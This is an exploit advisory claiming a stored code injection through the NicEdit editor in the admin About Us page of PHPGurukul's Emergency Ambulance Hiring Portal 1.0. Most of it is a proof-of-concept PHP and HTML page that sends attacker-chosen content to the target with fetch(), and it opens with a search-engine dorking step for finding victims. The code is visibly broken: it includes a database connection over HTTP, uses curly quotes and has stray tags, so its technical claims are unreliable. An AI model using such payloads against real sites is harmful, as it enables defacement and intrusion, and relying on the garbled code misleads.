Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection

=============================================================================================================================================
| # Title : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php .

[+] Line 2 : Make sure to include your database connection here

[+] Line 44 : Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload :

<?php
include(‘http://127.0.0.1/eahp/admin/includes/dbconnection.php’); // Make sure to include your database connection here

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’ WHERE PageType=’aboutus’”);

if ($query) {  
    echo '<script>alert("About Us has been updated.")</script>';  
} else {  
    echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit;  

}
?>

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>indoushka | Update About Us Content</title>
<!-- NicEdit Script -->
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
<script type="text/javascript">
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);

    // Function to handle form submission using JavaScript  
    function submitForm(event) {  
        event.preventDefault(); // Prevent default form submission

        const pagetitle = document.getElementById('pagetitle').value;  
        const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

        // Prepare the form data to be sent  
        const formData = new FormData();  
        formData.append('pagetitle', pagetitle);  
        formData.append('pagedes', pagedes);  
        formData.append('submit', true);

        // Send the form data using fetch API  
        fetch('http://127.0.0.1/eahp/admin/about-us.php', {  
            method: 'POST',  
            body: formData,  
        })  
        .then(response => response.text())  
        .then(data => {  
            alert('About Us content has been updated successfully.');  
            console.log(data); // Handle the response from the server  
        })  
        .catch(error => {  
            console.error('Error:', error);  
        });  
    }  
</script>  
<style>  
    /* Center the form container */  
    .editor-container {  
        max-width: 800px;  
        margin: 0 auto; /* Center horizontally */  
        padding: 20px;  
        text-align: center; /* Center the content inside */  
    }

    /* Ensure the textarea takes the full width */  
    #pagedes {  
        width: 100%;  
        height: 300px;  
        margin: 0 auto;  
    }  
</style>  

</head>
<body>
<div id="app">
<div class="app-content">
<div class="main-content">
<div class="wrap-content container" id="container">
<!-- Page Title Section -->
<section id="page-title">
<div class="row">
<div class="col-sm-8">
<h1 class="mainTitle">Update the About Us Content</h1>
</div>

                                                      </li>  
                        </ol>  
                    </div>  
                </section>  
                <!-- Form Section -->  
                <div class="container-fluid container-fullw bg-white">  
                    <div class="row">  
                        <div class="col-md-12">  
                            <!-- Centering the form using a wrapper div -->  
                            <div class="editor-container">  
                                <form class="forms-sample" method="post" onsubmit="submitForm(event);">  
                                    <div class="form-group">  
                                        <label for="pagetitle">Page Title</label>  
                                        <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
                                    </div>  
                                    <div class="form-group">  
                                        <label for="pagedes">Page Description</label>  
                                        <!-- NicEdit will enhance this textarea -->  
                                        <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
                                    </div>  
                                    <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
                                </form>  
                            </div>  
                        </div>  
                    </div>  
                </div>  
                <!-- End Form Section -->  
            </div>  
        </div>  
    </div>  
</div>  
<!-- Footer -->  

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================